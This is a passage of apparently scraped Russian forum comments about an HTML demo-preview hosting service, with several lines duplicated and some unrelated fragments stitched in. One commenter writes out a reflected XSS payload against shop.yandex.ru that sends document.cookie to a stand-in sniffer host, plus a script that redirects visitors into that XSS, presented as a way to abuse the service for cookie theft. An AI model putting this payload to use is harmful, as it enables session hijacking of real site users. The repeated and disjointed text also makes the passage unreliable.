Представляю — открыл пару десятков табов и 99% проца заняты :).
P.S. у меня как-то давно была сделать систему iframов, в которых по очереди будут менятся ссылки из баннеров партнёрок, но потом забил :)
P.S.S. Если грамотно сделать, то ничего так… :)
ну допустим кто-то нашёл XSS на Yandex (что-нибудь аля shop.yandex.ru/?category="><script>window.location='http://sniff-here.com/?'+document.cookie</script>), т.е. кто зайдёт туда у того угонятся кукисы, и в этом сервисе создать демонстрацию:
внесу в закладки, неплохо, может быть запретить javascriptы всяких редиректов и т.д., если сервис станет популярным, то, допустим на фрилансе говоришь заказчику — я хочу вот так вот demopreview.xexo.info/demo/view/b7c336729412877c4b6ffbef8d3a946e.html, а там бац, использование пассивной XSS какого-нибудь сайта (небойтесь, там всего-лишь редирект на хабр).
Представляю — открыл пару десятков табов и 99% проца заняты :).
P.S. у меня как-то давно была сделать систему iframов, в которых по очереди будут менятся ссылки из баннеров партнёрок, но потом забил :)
P.S.S. Если грамотно сделать, то ничего так… :)
<script>
window.location='http://shop.yandex.ru/?category="><script>window.location=\'http://sniff-here.com/?\'+document.cookie</script>';
</script>
Сначала редирект на XSS, а с XSS редирект на снифер с куками.
Правда в Linux и с помощью специализированной программы Fraqtive.
С помощью пинга локалхоста задержки делать + (не могу пока).